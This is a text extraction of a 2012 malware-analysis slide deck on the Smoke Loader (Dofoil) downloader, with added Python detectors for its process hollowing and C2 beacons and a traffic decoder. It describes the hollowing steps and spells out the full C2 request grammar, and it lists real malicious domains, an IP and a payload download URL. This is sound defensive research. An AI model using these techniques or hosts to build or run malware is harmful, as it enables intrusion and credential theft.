![Page 1: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/1.jpg)
THE CHEAPEST LOADER AROUND
Seeing Through the Smoke
Micky Pun
Sep 26th, 2012
Outline
Introduction
The Ecosystem of Dofoil
Code Analysis Highlights
Traffic Analysis Highlights
The Evolution of Dofoil
Smoke Loader vs other Loaders
Conclusion / Followup
Introduction
Smoke Loader
Smoke Loader package:
Administrative Interface
Loader Builder
Add-on modules
Dofoil (the loader binary built from the package; Dofoil is the AV detection name for Smoke Loader)
Downloaded Items
Upon successful execution it will download some of the following:
FakeAntivirus
Spambot
Hoax
Password stealer
SOCKS Server
Phishing (by HOST substitution)
The Ecosystem of Dofoil
The Ecosystem of Dofoil
Diagram: the infected computer uploads stolen information to the 2C server, and the stolen information is then retrieved from the 2C server.
The Ecosystem of Dofoil
Diagram of the wider ecosystem (2C server, infected computers, compromised webserver), with these labelled flows:
Infected computers send spam
A malicious file is uploaded to a compromised webserver using a stolen identity
An infected computer requests a download file from the 2C server
The 2C server redirects it to another URL (the download address can be modified)
The infected computer downloads the file from the compromised webserver
Code Analysis Highlights
Code Analysis Highlights
One of the early adopters of the CreateSection-UnmapViewOfSection-ResumeThread technique (a process-hollowing variant)
Successful in evading malware detection based on memory dumps
Code Analysis Highlight
Diagram (current process): encrypted data is decrypted into a new section, which then holds the malicious code.
Code Analysis Highlight
Diagram (injection into a new process), following the labels in order:
Current process: creates a new section and a new process (a copy of svchost.exe) in the SUSPENDED state
Reads PEB.ImageBaseAddress of the new process and 0x1000 bytes (the PE header) from that image base
Allocates a buffer (size = image size of svchost.exe) and copies the image from the image base address
Finds the entry point and changes the instruction there to: JUMP [address of the section holding the malicious routine]; Return
Section (with the malicious routine)
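As an added example (mine, not from the talk), the check a memory-forensics tool can make against the entry-point patch shown in the diagram above: parse the 0x1000-byte PE header read from the image base, locate AddressOfEntryPoint, and flag an entry point whose first instruction hands control to an address outside the module's own image. It decodes both `jmp rel32` and `push imm32; ret` redirections (the slide only says "JUMP"); the header builder and the entry bytes are constructed samples, not svchost.exe, and the field offsets are the standard PE32/PE32+ layout.

```python
import struct

def build_min_pe_header(image_base, entry_rva, size_of_image, pe32plus=False):
    """Constructed sample: a minimal PE header as the loader reads it (0x1000 bytes
    from PEB.ImageBaseAddress). Not a real svchost.exe header."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)   # Magic
    struct.pack_into("<I", opt, 16, entry_rva)                      # AddressOfEntryPoint
    if pe32plus:
        struct.pack_into("<Q", opt, 24, image_base)                 # ImageBase, PE32+
    else:
        struct.pack_into("<I", opt, 28, image_base)                 # ImageBase, PE32
    struct.pack_into("<I", opt, 56, size_of_image)                  # SizeOfImage
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    return (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)).ljust(0x1000, b"\0")

def parse_pe_header(hdr):
    """Return (image_base, entry_rva, size_of_image) from an in-memory PE header."""
    if hdr[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", hdr, 0x3C)[0]
    if hdr[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                   # optional header follows the 20-byte file header
    magic = struct.unpack_from("<H", hdr, opt)[0]
    entry_rva = struct.unpack_from("<I", hdr, opt + 16)[0]
    if magic == 0x20B:                    # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", hdr, opt + 24)[0]
    else:                                 # PE32: 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", hdr, opt + 28)[0]
    return image_base, entry_rva, struct.unpack_from("<I", hdr, opt + 56)[0]

def entry_redirect_target(hdr, entry_bytes):
    """Address the entry point hands control to when it lies outside the module image;
    None if the first instruction is not jmp rel32 / push imm32; ret, or stays in-image."""
    image_base, entry_rva, size = parse_pe_header(hdr)
    entry_va = image_base + entry_rva
    target = None
    if len(entry_bytes) >= 5 and entry_bytes[0] == 0xE9:                        # jmp rel32
        target = entry_va + 5 + struct.unpack_from("<i", entry_bytes, 1)[0]
    elif len(entry_bytes) >= 6 and entry_bytes[0] == 0x68 and entry_bytes[5] == 0xC3:
        target = struct.unpack_from("<I", entry_bytes, 1)[0]                  # push imm32; ret
    if target is not None and not image_base <= target < image_base + size:
        return target
    return None

HDR = build_min_pe_header(image_base=0x01000000, entry_rva=0x2509, size_of_image=0x6000)  # constructed
CLEAN_ENTRY = bytes.fromhex("8bff558bec")                           # mov edi,edi; push ebp; mov ebp,esp
LOCAL_JMP = b"\xe9" + struct.pack("<i", 0x100)                     # jmp that stays inside the image
HOLLOWED_ENTRY = b"\x68" + struct.pack("<I", 0x00330000) + b"\xc3"  # push 0x00330000; ret -> out of image
```

In a real dump the two inputs are the header bytes at the image base and the first few bytes at ImageBase + AddressOfEntryPoint; a non-None result is the foreign section to carve next.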
Traffic Analysis Highlights
Payload flow diagram (testing network): Phase 1, Phase 2, Phase 3; static download and dynamic download.
Static Download Phase
Download password stealer
HTTP Request to 2C Server
[2C host]/index.php?cmd=grab&data=&login=[MD5 of the computer name][volume serial number]
HTTP Reply to infected computer
Password stealer MZ, encrypted with XOR key
Static Download Phase
Download Socket Server
HTTP Request to 2C Server
[2C host]/index.php?cmd=getproxy
HTTP Reply to infected computer
Socket server MZ, encrypted with XOR key
Static Download Phase
Notify Backdoor connection
HTTP Request to 2C Server
[2C host]/index.php?cmd=getsocks&login=[MD5 of the computer name][volume serial number]&port=[opened socket port number]
HTTP Reply to infected computer
HTTP/1.1 200 OK
Dynamic Download Phase
Request for the number of dynamic downloads
HTTP Request to 2C Server
[2C host]/index.php?cmd=getload&login=[MD5 of the computer name][volume serial number]&sel=[malware version name]&ver=[malware version number]&bits=0
HTTP Reply to infected computer
[Marker][number of files available from the 2C server]
Example (screenshot of a request): the login value is the 32-byte MD5 sum followed by the 8-byte volume serial number, then the version number.
Dynamic Download Phase
Iterate through the downloads
HTTP Request to 2C Server
[2C host]/index.php?cmd=getload&login=[MD5 of the computer name][volume serial number]&sel=[malware version name]&ver=[malware version number]&bits=0&file=[index]
HTTP Reply to infected computer
HTTP/1.1 302 Found
Location: [URL of the executable]
Dynamic Download Phase
Acknowledge execution
HTTP Request to 2C Server
[2C host]/index.php?cmd=getload&login=[MD5 of the computer name][volume serial number]&sel=[malware version name]&ver=[malware version number]&bits=0&file=[index]&run=ok
HTTP Reply to infected computer
HTTP/1.1 200 OK
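An added example (not from the talk) that turns the request grammar of the static and dynamic download phases above into a proxy-log check: it accepts only index.php requests whose cmd is one of grab/getproxy/getsocks/getload, whose login is 32 hex characters of MD5 followed by 8 hex characters of volume serial number, and whose getload requests carry sel, ver and bits, then labels which step of the flow each hit is. The host name, the log format and the login value are constructed; the C2 host stands in for the slides' "2C host".

```python
import re
from urllib.parse import urlsplit, parse_qs

LOGIN_RE = re.compile(r"^[0-9a-fA-F]{32}[0-9a-fA-F]{8}$")   # MD5(computer name) + volume serial
PHASES = {"grab": "static: download password stealer", "getproxy": "static: download socket server",
          "getsocks": "static: notify backdoor connection", "getload": "dynamic download"}

def classify_request(url):
    """Return (cmd, phase, detail) when the URL fits the Dofoil beacon grammar, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    cmd = q.get("cmd", [None])[0]
    if cmd not in PHASES:
        return None
    if cmd != "getproxy" and not LOGIN_RE.match(q.get("login", [""])[0]):
        return None                                   # getproxy is the only login-less command
    if cmd == "getload" and not all(k in q for k in ("sel", "ver", "bits")):
        return None
    detail = ""
    if cmd == "getload":                              # which step of the dynamic phase?
        if "file" not in q:
            detail = "enumerate downloads"
        elif q.get("run", [""])[0] == "ok":
            detail = "ack execution of file " + q["file"][0]
        else:
            detail = "fetch file " + q["file"][0]
    elif cmd == "getsocks":
        detail = "socks port " + q.get("port", ["?"])[0]
    return cmd, PHASES[cmd], detail

def scan_proxy_log(lines):
    """Constructed log format: '<timestamp> <client> <method> <url>' per line."""
    hits = []
    for line in lines:
        fields = line.split()
        hit = classify_request(fields[3]) if len(fields) >= 4 else None
        if hit:
            hits.append((fields[1],) + hit)
    return hits

# Constructed sample: c2.example.invalid stands in for the 2C host; login is MD5("") + a made-up serial.
LOGIN = "d41d8cd98f00b204e9800998ecf8427e" + "1a2b3c4d"
C2 = "http://c2.example.invalid/index.php?"
SAMPLE_LOG = [
    "2012-05-10T10:00:01 10.0.0.5 GET " + C2 + "cmd=grab&data=&login=" + LOGIN,
    "2012-05-10T10:00:02 10.0.0.5 GET " + C2 + "cmd=getproxy",
    "2012-05-10T10:00:03 10.0.0.5 GET " + C2 + "cmd=getsocks&login=" + LOGIN + "&port=1080",
    "2012-05-10T10:00:04 10.0.0.5 GET " + C2 + "cmd=getload&login=" + LOGIN + "&sel=v2&ver=2&bits=0",
    "2012-05-10T10:00:05 10.0.0.5 GET " + C2 + "cmd=getload&login=" + LOGIN + "&sel=v2&ver=2&bits=0&file=1",
    "2012-05-10T10:00:06 10.0.0.5 GET " + C2 + "cmd=getload&login=" + LOGIN + "&sel=v2&ver=2&bits=0&file=1&run=ok",
    "2012-05-10T10:00:07 10.0.0.9 GET http://www.example.com/index.php?cmd=getload&login=notahash&sel=a&ver=1&bits=0",
]
```

The last sample line is rejected because its login is not 40 hex characters, which is the check that separates these beacons from ordinary index.php traffic.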
The Evolution of Dofoil
The Evolution of Dofoil
First discovered (~Nov 2011)
Added anti-debug and anti-VM mechanisms (~Jan 2012)
Changed outermost packer / encrypted all traffic (~March 2012)
Anti-debug
Anti-VMware
On a side note…
Heuristic Evasion
Screenshots: newer version (Feb 2012) vs older version (Jan 2012)
Traffic Decryption Enhancement
Step 1: BASE64 decode (screenshot shows the original request and its decoded form)
Step 2: XOR with the first key byte
Layout of the decoded data:
#define key[1]
#define data_length[4]
#define data[data_length]
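An added decoder (mine, not from the talk) for the encrypted request format described above: base64, then XOR with the first key byte, with the key[1]/data_length[4]/data[] layout. It is run on the Dofoil query string shown on the "Comparing Dofoil and Sasfis" slide later in the deck. Assumptions not stated on the slides: data_length is little-endian and stored in the clear, and only data[] is XORed.

```python
import base64
import struct
from urllib.parse import unquote

def decode_dofoil_request(query):
    """Undo the two steps from the slides: base64, then XOR with the first byte.
    Layout after base64 (from the slides): key[1], data_length[4], data[data_length].
    Assumptions (mine, not stated on the slides): data_length is little-endian and
    stored in the clear; only data[] is XORed with the single key byte."""
    raw = base64.b64decode(unquote(query))      # a live capture would be percent-encoded
    if len(raw) < 5:
        raise ValueError("too short to hold key[1] and data_length[4]")
    key = raw[0]
    declared_len = struct.unpack_from("<I", raw, 1)[0]
    body = raw[5:]
    return {
        "key": key,
        "declared_length": declared_len,
        "truncated": len(body) < declared_len,   # capture shorter than the header claims
        "plaintext": bytes(b ^ key for b in body).decode("latin-1"),
    }

def encode_dofoil_request(plaintext, key):
    """Inverse transform, used here only to show the decoder round-trips."""
    data = plaintext.encode("latin-1")
    raw = bytes([key]) + struct.pack("<I", len(data)) + bytes(b ^ key for b in data)
    return base64.b64encode(raw).decode("ascii")

# Query string copied from the "Comparing Dofoil and Sasfis" slide (its three wrapped
# lines joined); the slide shows only the first 64 base64 characters of the request.
SLIDE_QUERY = "wFoAAACjraT9p6W0rK+hpOasr6eprv3y9/KC8ob5+fP2hPOGhvPw+YPz8PDx8YKG"

if __name__ == "__main__":
    r = decode_dofoil_request(SLIDE_QUERY)
    print("key=0x%02x declared=%d truncated=%s" % (r["key"], r["declared_length"], r["truncated"]))
    print(r["plaintext"])
```

Decoding the slide's sample gives the dynamic-phase getload beacon (key 0xC0, declared length 90, login cut short by the slide's truncation); the slide's condensed "after decryption" line shows the same string with the get and login= fragments dropped.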
Remarks
Earlier generations had a mostly static number of downloaded items
Later generations tend to return a decreasing number of dynamic downloads when the sample is replicated more than once within a recent time frame
Smoke Loader vs other Loaders
Ann Loader
Off-the-shelf product
Sold in plans from $330 up to the most expensive at $825
Updates cost around $35 ~ $85
Source code is also available for sale
Tasks defined on the server side
Data on the location and status of bots; statistics on botnet growth and health
Modules available: password stealer (ThiefX), host file substitution, keylogger
Ann Loader (screenshot)
Umbra Loader
Free and Open source
Pay by purchasing plugins
Polished Web Admin interface
Waiting for commands from 2C server
Umbra Loader (screenshots)
Smoke Loader vs other Loaders
| Feature | Smoke Loader | Umbra Loader | Ann Loader |
|---|---|---|---|
| Administrative interface | √ | √ | √ |
| Rebuild Loader | √ | √ | √ |
| SOCKS5 server | √ | N/A* | √ |
| Host substitution | √ | N/A* | √ |
| Password stealer / form grabber | √ | N/A* | √ |
| Key logging | | N/A* | √ |
| Self-destruction mechanism | ** | √ | √ |
| Price | Starting at $150 | Free | Starting at $330 |

Rows whose column assignment did not survive extraction: Rebuild Builder √; Allows file upload and execution √ √; Allows additional plugins √

* Available for sale as a plugin by other developers
** A non-resident version is provided
![Page 43: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/43.jpg)
Conclusion / Follow-up
![Page 44: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/44.jpg)
“The Smoke Loader Advantage”
Ideal candidate for PPI deployment
Provides a mixture of predetermined tasks and dynamic tasks
Lowers the entry cost barrier to the cyber crime industry
![Page 45: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/45.jpg)
Follow-up
Last Dofoil recorded: 2012-05-10, beaufortseaa139.ru @ 213.152.180.178
First Sasfis discovered: 2012-05-31, krasguatanany.ru @ 213.152.180.178
![Page 46: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/46.jpg)
Comparing Dofoil and Sasfis
Dofoil:
GET /aaa/index.php?wFoAAACjraT9p6W0rK+hpOasr6eprv3y9/KC8ob5+fP2hPOGhvPw+YPz8PDx8YKG
After decryption: /aaa/index.php?cmd=load&272B2F9936D3FF309C30011BF
Reply: 302 FOUND, Location: http://triarearc.org/20030101news_files/1.exe
Sasfis:
GET /gley/index.php?r=gate&id=84a947ad&group=30.05.2012&debug=0
Reply: c=rdl&u=http://krasguatanany.ru/gley/get/p3.dll.crp&a=0&k=0000493e
Thank You